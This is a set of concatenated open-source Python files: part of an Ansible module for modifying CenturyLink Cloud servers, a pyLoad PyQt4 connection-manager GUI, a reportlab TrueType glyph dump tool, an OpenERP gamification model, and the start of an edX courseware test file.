"verbs":[
"GET",
"PATCH",
"DELETE"
]
},
{
"href":"/v2/groups/wfad/086ac1dfe0b6411989e8d1b77c4065f0",
"id":"086ac1dfe0b6411989e8d1b77c4065f0",
"rel":"group"
},
{
"href":"/v2/accounts/wfad",
"id":"wfad",
"rel":"account"
},
{
"href":"/v2/billing/wfad/serverPricing/test-server",
"rel":"billing"
},
{
"href":"/v2/servers/wfad/test-server/publicIPAddresses",
"rel":"publicIPAddresses",
"verbs":[
"POST"
]
},
{
"href":"/v2/servers/wfad/test-server/credentials",
"rel":"credentials"
},
{
"href":"/v2/servers/wfad/test-server/statistics",
"rel":"statistics"
},
{
"href":"/v2/servers/wfad/510ec21ae82d4dc89d28479753bf736a/upcomingScheduledActivities",
"rel":"upcomingScheduledActivities"
},
{
"href":"/v2/servers/wfad/510ec21ae82d4dc89d28479753bf736a/scheduledActivities",
"rel":"scheduledActivities",
"verbs":[
"GET",
"POST"
]
},
{
"href":"/v2/servers/wfad/test-server/capabilities",
"rel":"capabilities"
},
{
"href":"/v2/servers/wfad/test-server/alertPolicies",
"rel":"alertPolicyMappings",
"verbs":[
"POST"
]
},
{
"href":"/v2/servers/wfad/test-server/antiAffinityPolicy",
"rel":"antiAffinityPolicyMapping",
"verbs":[
"PUT",
"DELETE"
]
},
{
"href":"/v2/servers/wfad/test-server/cpuAutoscalePolicy",
"rel":"cpuAutoscalePolicyMapping",
"verbs":[
"PUT",
"DELETE"
]
}
],
"locationId":"UC1",
"name":"test-server",
"os":"ubuntu14_64Bit",
"osType":"Ubuntu 14 64-bit",
"status":"active",
"storageType":"standard",
"type":"standard"
}
]
'''
__version__ = '${version}'
from distutils.version import LooseVersion
try:
import requests
except ImportError:
REQUESTS_FOUND = False
else:
REQUESTS_FOUND = True
#
# Requires the clc-python-sdk.
# sudo pip install clc-sdk
#
try:
import clc as clc_sdk
from clc import CLCException
from clc import APIFailedResponse
except ImportError:
CLC_FOUND = False
clc_sdk = None
else:
CLC_FOUND = True
class ClcModifyServer:
clc = clc_sdk
def __init__(self, module):
"""
Construct module
"""
self.clc = clc_sdk
self.module = module
if not CLC_FOUND:
self.module.fail_json(
msg='clc-python-sdk required for this module')
if not REQUESTS_FOUND:
self.module.fail_json(
msg='requests library is required for this module')
if requests.__version__ and LooseVersion(
requests.__version__) < LooseVersion('2.5.0'):
self.module.fail_json(
msg='requests library version should be >= 2.5.0')
self._set_user_agent(self.clc)
def process_request(self):
"""
Process the request - Main Code Path
:return: Returns with either an exit_json or fail_json
"""
self._set_clc_credentials_from_env()
p = self.module.params
cpu = p.get('cpu')
memory = p.get('memory')
state = p.get('state')
if state == 'absent' and (cpu or memory):
return self.module.fail_json(
msg='\'absent\' state is not supported for \'cpu\' and \'memory\' arguments')
server_ids = p['server_ids']
if not isinstance(server_ids, list):
return self.module.fail_json(
msg='server_ids needs to be a list of instances to modify: %s' %
server_ids)
(changed, server_dict_array, changed_server_ids) = self._modify_servers(
server_ids=server_ids)
self.module.exit_json(
changed=changed,
server_ids=changed_server_ids,
servers=server_dict_array)
@staticmethod
def _define_module_argument_spec():
"""
Define the argument spec for the ansible module
:return: argument spec dictionary
"""
argument_spec = dict(
server_ids=dict(type='list', required=True),
state=dict(default='present', choices=['present', 'absent']),
cpu=dict(),
memory=dict(),
anti_affinity_policy_id=dict(),
anti_affinity_policy_name=dict(),
alert_policy_id=dict(),
alert_policy_name=dict(),
wait=dict(type='bool', default=True)
)
mutually_exclusive = [
['anti_affinity_policy_id', 'anti_affinity_policy_name'],
['alert_policy_id', 'alert_policy_name']
]
return {"argument_spec": argument_spec,
"mutually_exclusive": mutually_exclusive}
def _set_clc_credentials_from_env(self):
"""
Set the CLC Credentials on the sdk by reading environment variables
:return: none
"""
env = os.environ
v2_api_token = env.get('CLC_V2_API_TOKEN', False)
v2_api_username = env.get('CLC_V2_API_USERNAME', False)
v2_api_passwd = env.get('CLC_V2_API_PASSWD', False)
clc_alias = env.get('CLC_ACCT_ALIAS', False)
api_url = env.get('CLC_V2_API_URL', False)
if api_url:
self.clc.defaults.ENDPOINT_URL_V2 = api_url
if v2_api_token and clc_alias:
self.clc._LOGIN_TOKEN_V2 = v2_api_token
self.clc._V2_ENABLED = True
self.clc.ALIAS = clc_alias
elif v2_api_username and v2_api_passwd:
self.clc.v2.SetCredentials(
api_username=v2_api_username,
api_passwd=v2_api_passwd)
else:
return self.module.fail_json(
msg="You must set the CLC_V2_API_USERNAME and CLC_V2_API_PASSWD "
"environment variables")
def _get_servers_from_clc(self, server_list, message):
"""
Internal function to fetch list of CLC server objects from a list of server ids
:param server_list: The list of server ids
:param message: the error message to throw in case of any error
:return the list of CLC server objects
"""
try:
return self.clc.v2.Servers(server_list).servers
except CLCException as ex:
return self.module.fail_json(msg=message + ': %s' % ex.message)
def _modify_servers(self, server_ids):
"""
modify the servers configuration on the provided list
:param server_ids: list of servers to modify
:return: a list of dictionaries with server information about the servers that were modified
"""
p = self.module.params
state = p.get('state')
server_params = {
'cpu': p.get('cpu'),
'memory': p.get('memory'),
'anti_affinity_policy_id': p.get('anti_affinity_policy_id'),
'anti_affinity_policy_name': p.get('anti_affinity_policy_name'),
'alert_policy_id': p.get('alert_policy_id'),
'alert_policy_name': p.get('alert_policy_name'),
}
changed = False
server_changed = False
aa_changed = False
ap_changed = False
server_dict_array = []
result_server_ids = []
request_list = []
changed_servers = []
if not isinstance(server_ids, list) or len(server_ids) < 1:
return self.module.fail_json(
msg='server_ids should be a list of servers, aborting')
servers = self._get_servers_from_clc(
server_ids,
'Failed to obtain server list from the CLC API')
for server in servers:
if state == 'present':
server_changed, server_result = self._ensure_server_config(
server, server_params)
if server_result:
request_list.append(server_result)
aa_changed = self._ensure_aa_policy_present(
server,
server_params)
ap_changed = self._ensure_alert_policy_present(
server,
server_params)
elif state == 'absent':
aa_changed = self._ensure_aa_policy_absent(
server,
server_params)
ap_changed = self._ensure_alert_policy_absent(
server,
server_params)
if server_changed or aa_changed or ap_changed:
changed_servers.append(server)
changed = True
self._wait_for_requests(self.module, request_list)
self._refresh_servers(self.module, changed_servers)
for server in changed_servers:
server_dict_array.append(server.data)
result_server_ids.append(server.id)
return changed, server_dict_array, result_server_ids
def _ensure_server_config(
self, server, server_params):
"""
ensures the server is updated with the provided cpu and memory
:param server: the CLC server object
:param server_params: the dictionary of server parameters
:return: (changed, group) -
changed: Boolean whether a change was made
result: The result from the CLC API call
"""
cpu = server_params.get('cpu')
memory = server_params.get('memory')
changed = False
result = None
if not cpu:
cpu = server.cpu
if not memory:
memory = server.memory
if memory != server.memory or cpu != server.cpu:
if not self.module.check_mode:
result = self._modify_clc_server(
self.clc,
self.module,
server.id,
cpu,
memory)
changed = True
return changed, result
@staticmethod
def _modify_clc_server(clc, module, server_id, cpu, memory):
"""
Modify the memory or CPU of a clc server.
:param clc: the clc-sdk instance to use
:param module: the AnsibleModule object
:param server_id: id of the server to modify
:param cpu: the new cpu value
:param memory: the new memory value
:return: the result of CLC API call
"""
result = None
acct_alias = clc.v2.Account.GetAlias()
try:
# Update the server configuration
job_obj = clc.v2.API.Call('PATCH',
'servers/%s/%s' % (acct_alias,
server_id),
json.dumps([{"op": "set",
"member": "memory",
"value": memory},
{"op": "set",
"member": "cpu",
"value": cpu}]))
result = clc.v2.Requests(job_obj)
except APIFailedResponse as ex:
module.fail_json(
msg='Unable to update the server configuration for server : "{0}". {1}'.format(
server_id, str(ex.response_text)))
return result
@staticmethod
def _wait_for_requests(module, request_list):
"""
Block until server provisioning requests are completed.
:param module: the AnsibleModule object
:param request_list: a list of clc-sdk.Request instances
:return: none
"""
wait = module.params.get('wait')
if wait:
# Requests.WaitUntilComplete() returns the count of failed requests
failed_requests_count = sum(
[request.WaitUntilComplete() for request in request_list])
if failed_requests_count > 0:
module.fail_json(
msg='Unable to process modify server request')
@staticmethod
def _refresh_servers(module, servers):
"""
Loop through a list of servers and refresh them.
:param module: the AnsibleModule object
:param servers: list of clc-sdk.Server instances to refresh
:return: none
"""
for server in servers:
try:
server.Refresh()
except CLCException as ex:
module.fail_json(msg='Unable to refresh the server {0}. {1}'.format(
server.id, ex.message
))
def _ensure_aa_policy_present(
self, server, server_params):
"""
ensures the server is updated with the provided anti affinity policy
:param server: the CLC server object
:param server_params: the dictionary of server parameters
:return: (changed, group) -
changed: Boolean whether a change was made
result: The result from the CLC API call
"""
changed = False
acct_alias = self.clc.v2.Account.GetAlias()
aa_policy_id = server_params.get('anti_affinity_policy_id')
aa_policy_name = server_params.get('anti_affinity_policy_name')
if not aa_policy_id and aa_policy_name:
aa_policy_id = self._get_aa_policy_id_by_name(
self.clc,
self.module,
acct_alias,
aa_policy_name)
current_aa_policy_id = self._get_aa_policy_id_of_server(
self.clc,
self.module,
acct_alias,
server.id)
if aa_policy_id and aa_policy_id != current_aa_policy_id:
self._modify_aa_policy(
self.clc,
self.module,
acct_alias,
server.id,
aa_policy_id)
changed = True
return changed
def _ensure_aa_policy_absent(
self, server, server_params):
"""
ensures the provided anti affinity policy is removed from the server
:param server: the CLC server object
:param server_params: the dictionary of server parameters
:return: (changed, group) -
changed: Boolean whether a change was made
result: The result from the CLC API call
"""
changed = False
acct_alias = self.clc.v2.Account.GetAlias()
aa_policy_id = server_params.get('anti_affinity_policy_id')
aa_policy_name = server_params.get('anti_affinity_policy_name')
if not aa_policy_id and aa_policy_name:
aa_policy_id = self._get_aa_policy_id_by_name(
self.clc,
self.module,
acct_alias,
aa_policy_name)
current_aa_policy_id = self._get_aa_policy_id_of_server(
self.clc,
self.module,
acct_alias,
server.id)
if aa_policy_id and aa_policy_id == current_aa_policy_id:
self._delete_aa_policy(
self.clc,
self.module,
acct_alias,
server.id)
changed = True
return changed
@staticmethod
def _modify_aa_policy(clc, module, acct_alias, server_id, aa_policy_id):
"""
modifies the anti affinity policy of the CLC server
:param clc: the clc-sdk instance to use
:param module: the AnsibleModule object
:param acct_alias: the CLC account alias
:param server_id: the CLC server id
:param aa_policy_id: the anti affinity policy id
:return: result: The result from the CLC API call
"""
result = None
if not module.check_mode:
try:
result = clc.v2.API.Call('PUT',
'servers/%s/%s/antiAffinityPolicy' % (
acct_alias,
server_id),
json.dumps({"id": aa_policy_id}))
except APIFailedResponse as ex:
module.fail_json(
msg='Unable to modify anti affinity policy for server : "{0}". {1}'.format(
server_id, str(ex.response_text)))
return result
@staticmethod
def _delete_aa_policy(clc, module, acct_alias, server_id):
"""
Delete the anti affinity policy of the CLC server
:param clc: the clc-sdk instance to use
:param module: the AnsibleModule object
:param acct_alias: the CLC account alias
:param server_id: the CLC server id
:return: result: The result from the CLC API call
"""
result = None
if not module.check_mode:
try:
result = clc.v2.API.Call('DELETE',
'servers/%s/%s/antiAffinityPolicy' % (
acct_alias,
server_id),
json.dumps({}))
except APIFailedResponse as ex:
module.fail_json(
msg='Unable to delete anti affinity policy from server : "{0}". {1}'.format(
server_id, str(ex.response_text)))
return result
@staticmethod
def _get_aa_policy_id_by_name(clc, module, alias, aa_policy_name):
"""
retrieves the anti affinity policy id of the server based on the name of the policy
:param clc: the clc-sdk instance to use
:param module: the AnsibleModule object
:param alias: the CLC account alias
:param aa_policy_name: the anti affinity policy name
:return: aa_policy_id: The anti affinity policy id
"""
aa_policy_id = None
try:
aa_policies = clc.v2.API.Call(method='GET',
url='antiAffinityPolicies/%s' % alias)
except APIFailedResponse as ex:
return module.fail_json(
msg='Unable to fetch anti affinity policies from account alias : "{0}". {1}'.format(
alias, str(ex.response_text)))
for aa_policy in aa_policies.get('items'):
if aa_policy.get('name') == aa_policy_name:
if not aa_policy_id:
aa_policy_id = aa_policy.get('id')
else:
return module.fail_json(
msg='multiple anti affinity policies were found with policy name : %s' % aa_policy_name)
if not aa_policy_id:
module.fail_json(
msg='No anti affinity policy was found with policy name : %s' % aa_policy_name)
return aa_policy_id
@staticmethod
def _get_aa_policy_id_of_server(clc, module, alias, server_id):
"""
retrieves the anti affinity policy id of the server based on the CLC server id
:param clc: the clc-sdk instance to use
:param module: the AnsibleModule object
:param alias: the CLC account alias
:param server_id: the CLC server id
:return: aa_policy_id: The anti affinity policy id
"""
aa_policy_id = None
try:
result = clc.v2.API.Call(
method='GET', url='servers/%s/%s/antiAffinityPolicy' %
(alias, server_id))
aa_policy_id = result.get('id')
except APIFailedResponse as ex:
if ex.response_status_code != 404:
module.fail_json(msg='Unable to fetch anti affinity policy for server "{0}". {1}'.format(
server_id, str(ex.response_text)))
return aa_policy_id
def _ensure_alert_policy_present(
self, server, server_params):
"""
ensures the server is updated with the provided alert policy
:param server: the CLC server object
:param server_params: the dictionary of server parameters
:return: (changed, group) -
changed: Boolean whether a change was made
result: The result from the CLC API call
"""
changed = False
acct_alias = self.clc.v2.Account.GetAlias()
alert_policy_id = server_params.get('alert_policy_id')
alert_policy_name = server_params.get('alert_policy_name')
if not alert_policy_id and alert_policy_name:
alert_policy_id = self._get_alert_policy_id_by_name(
self.clc,
self.module,
acct_alias,
alert_policy_name)
if alert_policy_id and not self._alert_policy_exists(
server, alert_policy_id):
self._add_alert_policy_to_server(
self.clc,
self.module,
acct_alias,
server.id,
alert_policy_id)
changed = True
return changed
def _ensure_alert_policy_absent(
self, server, server_params):
"""
ensures the alert policy is removed from the server
:param server: the CLC server object
:param server_params: the dictionary of server parameters
:return: (changed, group) -
changed: Boolean whether a change was made
result: The result from the CLC API call
"""
changed = False
acct_alias = self.clc.v2.Account.GetAlias()
alert_policy_id = server_params.get('alert_policy_id')
alert_policy_name = server_params.get('alert_policy_name')
if not alert_policy_id and alert_policy_name:
alert_policy_id = self._get_alert_policy_id_by_name(
self.clc,
self.module,
acct_alias,
alert_policy_name)
if alert_policy_id and self._alert_policy_exists(
server, alert_policy_id):
self._remove_alert_policy_to_server(
self.clc,
self.module,
acct_alias,
server.id,
alert_policy_id)
changed = True
return changed
@staticmethod
def _add_alert_policy_to_server(
clc, module, acct_alias, server_id, alert_policy_id):
"""
add the alert policy to the CLC server
:param clc: the clc-sdk instance to use
:param module: the AnsibleModule object
:param acct_alias: the CLC account alias
:param server_id: the CLC server id
:param alert_policy_id: the alert policy id
:return: result: The result from the CLC API call
"""
result = None
if not module.check_mode:
try:
result = clc.v2.API.Call('POST',
'servers/%s/%s/alertPolicies' % (
acct_alias,
server_id),
json.dumps({"id": alert_policy_id}))
except APIFailedResponse as ex:
module.fail_json(msg='Unable to set alert policy to the server : "{0}". {1}'.format(
server_id, str(ex.response_text)))
return result
@staticmethod
def _remove_alert_policy_to_server(
clc, module, acct_alias, server_id, alert_policy_id):
"""
remove the alert policy from the CLC server
:param clc: the clc-sdk instance to use
:param module: the AnsibleModule object
:param acct_alias: the CLC account alias
:param server_id: the CLC server id
:param alert_policy_id: the alert policy id
:return: result: The result from the CLC API call
"""
result = None
if not module.check_mode:
try:
result = clc.v2.API.Call('DELETE',
'servers/%s/%s/alertPolicies/%s'
% (acct_alias, server_id, alert_policy_id))
except APIFailedResponse as ex:
module.fail_json(msg='Unable to remove alert policy from the server : "{0}". {1}'.format(
server_id, str(ex.response_text)))
return result
@staticmethod
def _get_alert_policy_id_by_name(clc, module, alias, alert_policy_name):
"""
retrieves the alert policy id of the server based on the name of the policy
:param clc: the clc-sdk instance to use
:param module: the AnsibleModule object
:param alias: the CLC account alias
:param alert_policy_name: the alert policy name
:return: alert_policy_id: The alert policy id
"""
alert_policy_id = None
try:
alert_policies = clc.v2.API.Call(method='GET',
url='alertPolicies/%s' % alias)
except APIFailedResponse as ex:
return module.fail_json(msg='Unable to fetch alert policies for account : "{0}". {1}'.format(
alias, str(ex.response_text)))
for alert_policy in alert_policies.get('items'):
if alert_policy.get('name') == alert_policy_name:
if not alert_policy_id:
alert_policy_id = alert_policy.get('id')
else:
return module.fail_json(
msg='multiple alert policies were found with policy name : %s' % alert_policy_name)
return alert_policy_id
@staticmethod
def _alert_policy_exists(server, alert_policy_id):
"""
Checks if the alert policy exists for the server
:param server: the clc server object
:param alert_policy_id: the alert policy
:return: True: if the given alert policy id associated to the server, False otherwise
"""
result = False
alert_policies = server.alertPolicies
if alert_policies:
for alert_policy in alert_policies:
if alert_policy.get('id') == alert_policy_id:
result = True
return result
@staticmethod
def _set_user_agent(clc):
if hasattr(clc, 'SetRequestsSession'):
agent_string = "ClcAnsibleModule/" + __version__
ses = requests.Session()
ses.headers.update({"Api-Client": agent_string})
ses.headers['User-Agent'] += " " + agent_string
clc.SetRequestsSession(ses)
def main():
"""
The main function. Instantiates the module and calls process_request.
:return: none
"""
argument_dict = ClcModifyServer._define_module_argument_spec()
module = AnsibleModule(supports_check_mode=True, **argument_dict)
clc_modify_server = ClcModifyServer(module)
clc_modify_server.process_request()
from ansible.module_utils.basic import * # pylint: disable=W0614
if __name__ == '__main__':
main()
| gpl-3.0 |
OndrejIT/pyload | module/gui/ConnectionManager.py | 41 | 11002 | # -*- coding: utf-8 -*-
"""
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 3 of the License,
or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, see <http://www.gnu.org/licenses/>.
@author: mkaay
"""
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from os.path import join
from uuid import uuid4 as uuid
class ConnectionManager(QWidget):
warningShown = False
def __init__(self):
QWidget.__init__(self)
if not self.warningShown:
QMessageBox.warning(self, 'Warning',
"We are sorry but the GUI is not stable yet. Please use the webinterface for much better experience. \n", QMessageBox.Ok)
ConnectionManager.warningShown = True
mainLayout = QHBoxLayout()
buttonLayout = QVBoxLayout()
self.setWindowTitle(_("pyLoad ConnectionManager"))
self.setWindowIcon(QIcon(join(pypath, "icons","logo.png")))
connList = QListWidget()
new = QPushButton(_("New"))
edit = QPushButton(_("Edit"))
remove = QPushButton(_("Remove"))
connect = QPushButton(_("Connect"))
#box = QFrame()
boxLayout = QVBoxLayout()
#box.setLayout(boxLayout)
boxLayout.addWidget(QLabel(_("Connect:")))
boxLayout.addWidget(connList)
line = QFrame()
#line.setFixedWidth(100)
line.setFrameShape(line.HLine)
line.setFrameShadow(line.Sunken)
line.setFixedHeight(10)
boxLayout.addWidget(line)
form = QFormLayout()
form.setMargin(5)
form.setSpacing(20)
form.setAlignment(Qt.AlignRight)
checkbox = QCheckBox()
form.addRow(_("Use internal Core:"), checkbox)
boxLayout.addLayout(form)
mainLayout.addLayout(boxLayout)
mainLayout.addLayout(buttonLayout)
buttonLayout.addWidget(new)
buttonLayout.addWidget(edit)
buttonLayout.addWidget(remove)
buttonLayout.addStretch()
buttonLayout.addWidget(connect)
self.setLayout(mainLayout)
self.internal = checkbox
self.new = new
self.connectb = connect
self.remove = remove
self.editb = edit
self.connList = connList
self.edit = self.EditWindow()
self.connectSignals()
self.defaultStates = {}
def connectSignals(self):
self.connect(self, SIGNAL("setConnections"), self.setConnections)
self.connect(self.new, SIGNAL("clicked()"), self.slotNew)
self.connect(self.editb, SIGNAL("clicked()"), self.slotEdit)
self.connect(self.remove, SIGNAL("clicked()"), self.slotRemove)
self.connect(self.connectb, SIGNAL("clicked()"), self.slotConnect)
self.connect(self.edit, SIGNAL("save"), self.slotSave)
self.connect(self.connList, SIGNAL("itemDoubleClicked(QListWidgetItem *)"), self.slotItemDoubleClicked)
self.connect(self.internal, SIGNAL("clicked()"), self.slotInternal)
def setConnections(self, connections):
self.connList.clear()
for conn in connections:
item = QListWidgetItem()
item.setData(Qt.DisplayRole, QVariant(conn["name"]))
item.setData(Qt.UserRole, QVariant(conn))
self.connList.addItem(item)
if conn["default"]:
item.setData(Qt.DisplayRole, QVariant(_("%s (Default)") % conn["name"]))
self.connList.setCurrentItem(item)
def slotNew(self):
data = {"id":uuid().hex, "type":"remote", "default":False, "name":"", "host":"", "port":"7228", "user":"admin", "password":""}
self.edit.setData(data)
self.edit.show()
def slotEdit(self):
item = self.connList.currentItem()
data = item.data(Qt.UserRole).toPyObject()
data = self.cleanDict(data)
self.edit.setData(data)
self.edit.show()
def slotRemove(self):
item = self.connList.currentItem()
data = item.data(Qt.UserRole).toPyObject()
data = self.cleanDict(data)
self.emit(SIGNAL("removeConnection"), data)
def slotConnect(self):
if self.internal.checkState() == 2:
data = {"type": "internal"}
self.emit(SIGNAL("connect"), data)
else:
item = self.connList.currentItem()
data = item.data(Qt.UserRole).toPyObject()
data = self.cleanDict(data)
self.emit(SIGNAL("connect"), data)
def cleanDict(self, data):
tmp = {}
for k, d in data.items():
tmp[str(k)] = d
return tmp
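# Illustrative note (not part of the original file): data recovered via
# QVariant.toPyObject() typically comes back with QString keys, e.g.
# {QString(u'name'): u'local'}. cleanDict() rebuilds the dict with plain
# str keys so lookups like data["id"] behave predictably:
#   cleanDict({QString(u'name'): u'local'}) -> {'name': u'local'}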
def slotSave(self, data):
self.emit(SIGNAL("saveConnection"), data)
def slotItemDoubleClicked(self, defaultItem):
data = defaultItem.data(Qt.UserRole).toPyObject()
self.setDefault(data, True)
did = self.cleanDict(data)["id"]
#allItems = self.connList.findItems("*", Qt.MatchWildcard)
count = self.connList.count()
for i in range(count):
item = self.connList.item(i)
data = item.data(Qt.UserRole).toPyObject()
if self.cleanDict(data)["id"] == did:
continue
self.setDefault(data, False)
def slotInternal(self):
if self.internal.checkState() == 2:
self.connList.clearSelection()
def setDefault(self, data, state):
data = self.cleanDict(data)
self.edit.setData(data)
data = self.edit.getData()
data["default"] = state
self.edit.emit(SIGNAL("save"), data)
class EditWindow(QWidget):
def __init__(self):
QWidget.__init__(self)
self.setWindowTitle(_("pyLoad ConnectionManager"))
self.setWindowIcon(QIcon(join(pypath, "icons","logo.png")))
grid = QGridLayout()
nameLabel = QLabel(_("Name:"))
hostLabel = QLabel(_("Host:"))
localLabel = QLabel(_("Local:"))
userLabel = QLabel(_("User:"))
pwLabel = QLabel(_("Password:"))
portLabel = QLabel(_("Port:"))
name = QLineEdit()
host = QLineEdit()
local = QCheckBox()
user = QLineEdit()
password = QLineEdit()
password.setEchoMode(QLineEdit.Password)
port = QSpinBox()
port.setRange(1,10000)
save = QPushButton(_("Save"))
cancel = QPushButton(_("Cancel"))
grid.addWidget(nameLabel, 0, 0)
grid.addWidget(name, 0, 1)
grid.addWidget(localLabel, 1, 0)
grid.addWidget(local, 1, 1)
grid.addWidget(hostLabel, 2, 0)
grid.addWidget(host, 2, 1)
grid.addWidget(portLabel, 3, 0)
grid.addWidget(port, 3, 1)
grid.addWidget(userLabel, 4, 0)
grid.addWidget(user, 4, 1)
grid.addWidget(pwLabel, 5, 0)
grid.addWidget(password, 5, 1)
grid.addWidget(cancel, 6, 0)
grid.addWidget(save, 6, 1)
self.setLayout(grid)
self.controls = {"name": name,
"host": host,
"local": local,
"user": user,
"password": password,
"port": port,
"save": save,
"cancel": cancel}
self.connect(cancel, SIGNAL("clicked()"), self.hide)
self.connect(save, SIGNAL("clicked()"), self.slotDone)
self.connect(local, SIGNAL("stateChanged(int)"), self.slotLocalChanged)
self.id = None
self.default = None
def setData(self, data):
if not data: return
self.id = data["id"]
self.default = data["default"]
self.controls["name"].setText(data["name"])
if data["type"] == "local":
data["local"] = True
else:
data["local"] = False
self.controls["local"].setChecked(data["local"])
if not data["local"]:
self.controls["user"].setText(data["user"])
self.controls["password"].setText(data["password"])
self.controls["port"].setValue(int(data["port"]))
self.controls["host"].setText(data["host"])
self.controls["user"].setDisabled(False)
self.controls["password"].setDisabled(False)
self.controls["port"].setDisabled(False)
self.controls["host"].setDisabled(False)
else:
self.controls["user"].setText("")
self.controls["port"].setValue(1)
self.controls["host"].setText("")
self.controls["user"].setDisabled(True)
self.controls["password"].setDisabled(True)
self.controls["port"].setDisabled(True)
self.controls["host"].setDisabled(True)
def slotLocalChanged(self, val):
if val == 2:
self.controls["user"].setDisabled(True)
self.controls["password"].setDisabled(True)
self.controls["port"].setDisabled(True)
self.controls["host"].setDisabled(True)
elif val == 0:
self.controls["user"].setDisabled(False)
self.controls["password"].setDisabled(False)
self.controls["port"].setDisabled(False)
self.controls["host"].setDisabled(False)
def getData(self):
d = {}
d["id"] = self.id
d["default"] = self.default
d["name"] = self.controls["name"].text()
d["local"] = self.controls["local"].isChecked()
d["user"] = self.controls["user"].text()
d["password"] = self.controls["password"].text()
d["host"] = self.controls["host"].text()
d["port"] = self.controls["port"].value()
if d["local"]:
d["type"] = "local"
else:
d["type"] = "remote"
return d
def slotDone(self):
data = self.getData()
self.hide()
self.emit(SIGNAL("save"), data)
| gpl-3.0 |
nakagami/reportlab | src/tools/utils/dumpttf.py | 10 | 1887 | __all__=('dumpttf',)
def dumpttf(fn,fontName=None, verbose=0):
'''dump out known glyphs from a ttf file'''
import os
if not os.path.isfile(fn):
raise IOError('No such file "%s"' % fn)
from reportlab.pdfbase.pdfmetrics import registerFont, stringWidth
from reportlab.pdfbase.ttfonts import TTFont
from reportlab.pdfgen.canvas import Canvas
if fontName is None:
fontName = os.path.splitext(os.path.basename(fn))[0]
dmpfn = '%s-ttf-dump.pdf' % fontName
ttf = TTFont(fontName, fn)
K = ttf.face.charToGlyph.keys()
registerFont(ttf)
c = Canvas(dmpfn)
W,H = c._pagesize
titleFontSize = 30 # title font size
titleFontName = 'Helvetica'
labelFontName = 'Courier'
fontSize = 10
border = 36
dx0 = stringWidth('12345: ', fontName, fontSize)
dx = dx0+20
dy = 20
K.sort()
y = 0
page = 0
for i, k in enumerate(K):
if y<border:
if page: c.showPage()
page += 1
y = H - border - titleFontSize
c.setFont(titleFontName, titleFontSize)
c.drawCentredString(W/2.0,y, 'TrueType Font %s Page %d' %(fontName,page))
y -= 0.2*titleFontSize + dy
x = border
c.setFont(labelFontName, 10)
c.drawString(x,y,'%5.5x:' % k )
c.setFont(fontName, 10)
c.drawString(x+dx0,y,unichr(k).encode('utf8'))
x += dx
if x+dx>W-border:
x = border
y -= dy
c.showPage()
c.save()
if verbose:
print 'Font %s("%s") has %d glyphs\ndumped to "%s"' % (fontName,fn,len(K),dmpfn)
if __name__=='__main__':
import sys, glob
if '--verbose' in sys.argv:
sys.argv.remove('--verbose')
verbose = 1
else:
verbose = 0
for a in sys.argv[1:]:
for fn in glob.glob(a):
dumpttf(fn, verbose=verbose)
| bsd-3-clause |
vrenaville/OCB | addons/gamification/models/res_users.py | 386 | 4010 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2013 OpenERP SA (<http://www.openerp.com>)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
#
##############################################################################
from openerp.osv import osv
from challenge import MAX_VISIBILITY_RANKING
class res_users_gamification_group(osv.Model):
""" Update of res.users class
- if adding groups to an user, check gamification.challenge linked to
this group, and the user. This is done by overriding the write method.
"""
_name = 'res.users'
_inherit = ['res.users']
def get_serialised_gamification_summary(self, cr, uid, excluded_categories=None, context=None):
return self._serialised_goals_summary(cr, uid, user_id=uid, excluded_categories=excluded_categories, context=context)
def _serialised_goals_summary(self, cr, uid, user_id, excluded_categories=None, context=None):
"""Return a serialised list of goals assigned to the user, grouped by challenge
:excluded_categories: list of challenge categories to exclude in search
[
{
'id': <gamification.challenge id>,
'name': <gamification.challenge name>,
'visibility_mode': <visibility {ranking,personal}>,
'currency': <res.currency id>,
'lines': [(see gamification_challenge._get_serialized_challenge_lines() format)]
},
]
"""
all_goals_info = []
challenge_obj = self.pool.get('gamification.challenge')
domain = [('user_ids', 'in', uid), ('state', '=', 'inprogress')]
if excluded_categories and isinstance(excluded_categories, list):
domain.append(('category', 'not in', excluded_categories))
user = self.browse(cr, uid, uid, context=context)
challenge_ids = challenge_obj.search(cr, uid, domain, context=context)
for challenge in challenge_obj.browse(cr, uid, challenge_ids, context=context):
# serialize goals info to be able to use it in javascript
lines = challenge_obj._get_serialized_challenge_lines(cr, uid, challenge, user_id, restrict_top=MAX_VISIBILITY_RANKING, context=context)
if lines:
all_goals_info.append({
'id': challenge.id,
'name': challenge.name,
'visibility_mode': challenge.visibility_mode,
'currency': user.company_id.currency_id.id,
'lines': lines,
})
return all_goals_info
def get_challenge_suggestions(self, cr, uid, context=None):
"""Return the list of challenges suggested to the user"""
challenge_info = []
challenge_obj = self.pool.get('gamification.challenge')
challenge_ids = challenge_obj.search(cr, uid, [('invited_user_ids', 'in', uid), ('state', '=', 'inprogress')], context=context)
for challenge in challenge_obj.browse(cr, uid, challenge_ids, context=context):
values = {
'id': challenge.id,
'name': challenge.name,
'description': challenge.description,
}
challenge_info.append(values)
return challenge_info
| agpl-3.0 |
ampax/edx-platform-backup | lms/djangoapps/courseware/tests/test_courses.py | 12 | 9342 | # -*- coding: utf-8 -*-
"""
Tests for course access
"""
from django.conf import settings
from django.test.utils import override_settings
import mock
from opaque_keys.edx.locations import SlashSeparatedCourseKey
from courseware.courses import (
get_course_by_id, get_cms_course_link, course_image_url,
get_course_info_section, get_course_about_section, get_cms_block_link
)
from courseware.tests.helpers import get_request_for_user
from student.tests.factories import UserFactory
import xmodule.modulestore.django as store_django
from xmodule.modulestore import ModuleStoreEnum
from xmodule.modulestore.xml_importer import import_from_xml
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from xmodule.modulestore.tests.django_utils import (
